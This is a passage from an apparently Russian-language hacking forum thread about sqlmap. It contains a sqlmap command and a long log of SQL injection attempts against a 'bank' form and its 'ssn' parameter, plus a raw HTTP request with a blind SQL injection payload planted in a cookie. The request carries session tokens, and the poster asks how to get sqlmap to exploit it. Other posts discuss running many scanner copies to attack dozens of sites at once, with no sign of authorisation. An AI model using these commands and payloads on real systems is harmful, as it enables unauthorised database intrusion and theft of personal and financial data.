C:\sql>python sqlmap.py -u
http://site/
bank --data="base=570%20and%208016%3d8016&country=&bank=& " --dbms=mysql --level 3 --risk 3 --random-agent --no-cast --threads 10 --time-sec=10

[*] starting at 21:06:23
[21:06:23] [INFO] fetched random HTTP User-Agent header from file 'C:\sql\txt\user-agents.txt': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.0; en) Opera 9.50'
[21:06:23] [WARNING] it appears that you have provided tainted parameter values ('base=570 and 8016%3d8016') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[21:06:25] [WARNING] provided value for parameter 'country' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[21:06:25] [WARNING] provided value for parameter 'bank' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[21:06:25] [WARNING] provided value for parameter 'type' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[21:06:25] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to '
http://site/bank
'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y
[21:06:30] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[21:06:31] [INFO] testing if the target URL is stable
[21:06:32] [WARNING] POST parameter 'ssn' does not appear dynamic
[21:06:33] [WARNING] heuristic (basic) test shows that POST parameter 'ssn' might not be injectable
[21:06:34] [INFO] testing for SQL injection on POST parameter 'ssn'
[21:06:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:07:21] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[21:08:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[21:08:43] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'
[21:09:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[21:10:00] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[21:10:48] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[21:11:36] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[21:12:22] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[21:13:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[21:13:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[21:13:14] [INFO] testing 'MySQL = 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[21:13:23] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[21:13:27] [INFO] testing 'MySQL = 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[21:13:56] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[21:14:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:14:46] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:15:09] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[21:15:33] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[21:15:59] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[21:16:23] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[21:16:48] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[21:17:11] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[21:17:36] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[21:17:37] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[21:17:38] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause'
[21:17:40] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause'
[21:17:42] [INFO] testing 'MySQL inline queries'
[21:17:43] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[21:17:58] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[21:18:23] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[21:18:44] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:19:08] [INFO] testing 'MySQL = 5.0.12 AND time-based blind (SELECT)'
[21:19:47] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
[21:20:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - comment)'
[21:20:27] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment)'
[21:20:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[21:21:10] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[21:21:34] [INFO] testing 'MySQL = 5.0.12 RLIKE time-based blind (SELECT)'
[21:22:47] [INFO] testing 'MySQL AND time-based blind (ELT)'
[21:23:13] [INFO] testing 'MySQL OR time-based blind (ELT)'
[21:23:38] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[21:24:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[21:24:03] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (SELECT)'
[21:24:04] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[21:24:06] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:28:55] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[21:34:25] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
it is not recommended to perform extended UNION tests if there is not at least one other (potential) technique found. Do you want to skip? [Y/n] y
[21:37:35] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[21:37:35] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[21:37:35] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[21:37:35] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[21:37:35] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')

↑
если запускать несколько копий sqlmap на одной машине для разных сайтов - это ускорит работу?

↑
Есть уязвимость в с сокет,точнее blind sqlini в сокет параметре
Как сделать запрос к sqlmap что бы он начал крутить?)
GET /url HTTP/1.1
Cookie: checked=1; guest_id=(Тут СКУЛЯ)=000683%20or%20'bSI5RhDA'='; session=100000000000011144483303108802873147495644 1558208322179665292278; dguid=_454657; XSRF-TOKEN=eyJpdiI6ImdQeG44V1NYTWF0bXNlaW1JeTdqZ1E9PSIs Im1hYyI6IjA4ZjIyZTAwZWQxZTg1MmY4NmUwYTg3NzMyNWY2Y2 YzMjRlYWI2NWYzMDZlYjIwMGM2Nzc3M2QyYWU0ZTVhMTIiLCJ2 YWx1ZSI6IjErVTg0MmJpR2tST0k5RERnZVFuMUtaajBPTkZLOV hzOVdydVJvckFSM2VSMWRIaE1nODZ0bVlwY2hwNXVlUFEwV0pP WjFNNUo3XC9VaG1raml2MW1MZz09In0=; laravel_session=eyJpdiI6ImdQeG44V1NYTWF0bXNlaW1JeT dqZ1E9PSIsIm1hYyI6IjA4ZjIyZTAwZWQxZTg1MmY4NmUwYTg3 NzMyNWY2Y2YzMjRlYWI2NWYzMDZlYjIwMGM2Nzc3M2QyYWU0ZT VhMTIiLCJ2YWx1ZSI6IjErVTg0MmJpR2tST0k5RERnZVFuMUta ajBPTkZLOVhzOVdydVJvckFSM2VSMWRIaE1nODZ0bVlwY2hwNX VlUFEwV0pPWjFNNUo3XC9VaG1raml2MW1MZz09In0=
X-Requested-With: XMLHttpRequest
Referer:
https://site.com:443/
Host:
https://site.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

↑
Конечно. Главное что бы инет позволял, однако я призываю вас, всем, проводить самостоятельно эксперименты, и делится результатом с публикой.

↑
если запускать несколько копий sqlmap на одной машине для разных сайтов - это ускорит работу?

↑
wtf а треды тебе на что?
если ты действительно имел ввиду то что спрашивал, то нет, количество копий для разных сайтов не ускорит работу о_О
"ну допустим я запустил копий 20, как понять - что добавление еще копий не ускорит работу, т.е интернет уже на пределе?" узнай лимит канала своего провайдера, хотя даже 1-2мб ты запаришся забивать sqlmap'ом, скорее тебе пров атата скажет

↑
не типа, смотри, запускаем одно временно сканить 2 сканеров и 20 разных сайтов, типа это будет по скорости быстрее, чем сканить с начало 1 сайт, потом второй итд...

↑
сканеры независимо друг от друга будут работать, как "сканер 1" поймет что сайт "site.com" уже просканирован "сканером 2"? для это же придумали потоки и треды